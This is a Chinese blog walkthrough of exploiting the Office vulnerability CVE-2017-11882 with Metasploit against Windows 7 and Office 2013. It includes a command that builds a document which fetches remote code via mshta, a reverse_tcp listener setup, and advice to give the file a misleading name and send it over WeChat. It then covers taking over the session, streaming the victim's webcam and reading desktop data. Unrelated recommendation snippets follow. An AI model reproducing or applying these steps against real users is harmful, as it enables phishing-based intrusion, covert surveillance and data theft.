MSF渗透测试-CVE-2017-11882(MSOffice漏洞)
1.测试环境
攻击机:
OS:kail
IP:192.168.15.132/192.168.137.231
靶机:
OS:Windows7
Office版本:Office2013_CN
IP:
2.测试前准备
2.下载MSF
组件
3.将cve_2017_11882.rb
复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/
目录下
4.把下载的cve_2017_11882.rtf
复制到/usr/share/metasploit-framework/data/exploits/
目录下
5.把Command109b_CVE-2017-11882.py
复制到/root
目录下
3.测试过程
3.1虚拟机环境测试
1.msfconsole
执行search
命令
2.设置payload
为reverse_tcp
,设置LHOST
为192.168.15.132
,设置URIPATH
为test
(之后利用python
脚本生成doc文件的时候也要使用相同路径)
3.show options
显示设置
4.exploit -j
运行
5.另开一个terminal
,python Command109b_CVE-2017-11882.py -c "mshta http://192.168.15.132:8080/test" -o kail_help.doc
6.把生成的kail_help
复制到靶机中打开,是个空白文档
7.回连成功
8.sessions -i 1
接管活动会话1,shell
可以看到已经成功渗透靶机
3.2局域网靶机测试
0.更改kail网络链接模式由NAT->桥接
,获得一个与靶机在同一网段下的IP192.168.137.231
1.更改一下LHOST
,重新生成一个doc文件,exploit -j
监听
2.将文件改名为kail_help2.doc
通过微信发给靶机(随便改啥,具有迷惑性就行)
3.靶机打开doc,Windows7防火墙处于打开状态,无杀软
4.攻击机获得回连,sessions -i 1
接管
5.webcam_stream
可以直接控制摄像头进行直播
6.shell
中获取靶机桌面信息
4.测试感想
- 前人栽树,后人乘凉。
github
和meterpreter-db
上有漏洞相关的msf模块
和python脚本
可以直接使用 - 老旧系统、软件十分不靠谱,易于攻入。其实还实践了
WindowsDefender+Windows10
的组合,WinodowsDefender
会直接将doc文件杀掉,但是这个版本的WIN7还是应用很广的,包括Office2013可以说是学生中应用十分广泛的版本(这个Windwos镜像和office2013都是徐日老师FTP服务器上的版本,在DKY安装率应该还是很有保证的)
MSF渗透测试-CVE-2017-11882(MSOffice漏洞)的更多相关文章
- 浅谈MSF渗透测试
在渗透过程中,MSF漏洞利用神器是不可或缺的.更何况它是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它本身附带数百个已知软件漏洞的专业级漏洞攻击工具.是信息收集. ...
- 【渗透测试】NSA Windows 0day漏洞+修复方案
这个漏洞是前段时间爆出来的,几乎影响了全球70%的电脑,不少高校.政府和企业都还在用Windows服务器,这次时间的影响力堪称网络大地震. ------------------------------ ...
- Metasloit渗透测试魔鬼训练营
总结一句话 漏洞 攻击 拿权限 维持访问 课程目标 掌握黑客渗透攻击流程 掌握常用攻击软件 渗透测试工程师 掌握常见windows漏洞挖掘和攻击 掌握常见linux漏洞挖掘和攻击 参 ...
- 黑盒渗透测试【转自HACK学习-FoxRoot】
因 搜到一篇写渗透测试步骤比较详细的文章,转过来学习,方便时常看看. 内容如下: 一.信息搜集 主动/被动搜集 信息搜集分为主动信息搜集和被动信息搜集. 主动信息搜集就是通过直接访问和扫描信息的方式进 ...
- 渗透测试的理论部分2——OSSTMM的详细描述
昨天休息了一天,今天我要连更两篇博客,作为补充,以下为正文 本章详细描述了OSSTMM内的RAV得分这一理论概念,对日后从事正规安全工作至关重要 OSSTMM为开源安全测试方法论,对OSSTMM不了解 ...
- ref:Web Service 渗透测试从入门到精通
ref:https://www.anquanke.com/post/id/85910 Web Service 渗透测试从入门到精通 发布时间:2017-04-18 14:26:54 译文声明:本文是翻 ...
- 2019-10-9:渗透测试,基础学习the-backdoor-factory-master(后门工厂)初接触
该文章仅供学习,利用方法来自网络文章,仅供参考 the-backdoor-factory-master(后门工制造厂)原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成pa ...
- 渗透测试(PenTest)基础指南
什么是渗透测试? 渗透测试(Penetration Test,简称为 PenTest),是指通过尝试利用漏洞攻击来评估IT基础设施的安全性.这些漏洞可能存在于操作系统.服务和应用程序的缺陷.不当配置或 ...
- Shodan在渗透测试及漏洞挖掘中的一些用法
渗透测试中,第一阶段就是信息搜集,这一阶段完成的如何决定了你之后的进行是否顺利,是否更容易.而关于信息收集的文章网上也是有太多.今天我们来通过一些例子来讲解如何正确使用Shodan这一利器. 想要利用 ...
随机推荐
- 【咸鱼教程】Egret可长按识别二维码(精确位置和大小)
教程目录一 实现原理二 实现过程三 Demo下载 本教程是在Egret中实现长按识别的二维码,并可以精确定位二维码的位置和大小,支持横屏和竖屏. 一 实现原理 微信中长按识别二维码,需要长按jpg或p ...
- locate命令的使用
使用locate命令,遇到了这样的情况:当前目录下有一个文件,而使用这个命令时却查找不到这个文件,上网查了一下,找到了原因,就在下面. 1. find find是最常见和最强大的查找命令,你可以用它找 ...
- HTML 5 Audio/Video DOM canplaythrough 事件在移动端遇到的坑
canplaythrough 事件定义和用法 当浏览器预计能够在不停下来进行缓冲的情况下持续播放指定的音频/视频时,会发生 canplaythrough 事件. 当音频/视频处于加载过程中时,会依次发 ...
- jquery 设置style:display 其实很方便的哦
("#id").css('display','none'); $("#id").css('display','block'); 或 $("#id&qu ...
- iptables、防火墙配置、NAT端口映射
一,配置一个filter表放火墙 (1)查看本机关于IPTABLES的设置情况 [root@tp ~]# iptables -L -n Chain INPUT (policy ACCEPT) targ ...
- 使用cv::invert()求解Mat矩阵的逆矩阵
opencv中cv::invert()可直接用来求解矩阵的逆矩阵 函数原型如下: double cv::invert(InputArray src, OutputArray dst, int fl ...
- NEFU 118 - n!后面有多少个0 & NEFU 119 - 组合素数 - [n!的素因子分解]
首先给出一个性质: n!的素因子分解中的素数p的幂为:[ n / p ] + [ n / p² ] + [ n / p³ ] + …… 举例证明: 例如我们有10!,我们要求它的素因子分解中2的幂: ...
- CodeForces - 617E XOR and Favorite Number 莫队算法
https://vjudge.net/problem/CodeForces-617E 题意,给你n个数ax,m个询问Ly,Ry, 问LR内有几对i,j,使得ai^...^ aj =k. 题解:第一道 ...
- SCSI共享磁盘
服务器端: [root@scsi ~]# fdisk -l Disk /dev/sda: 32.2 GB, 32212254720 bytes 255 heads, 63 sectors/track, ...
- ubuntu ssh 连接加速
vi /etc/ssh/sshd_config 最后加上 UseDNS no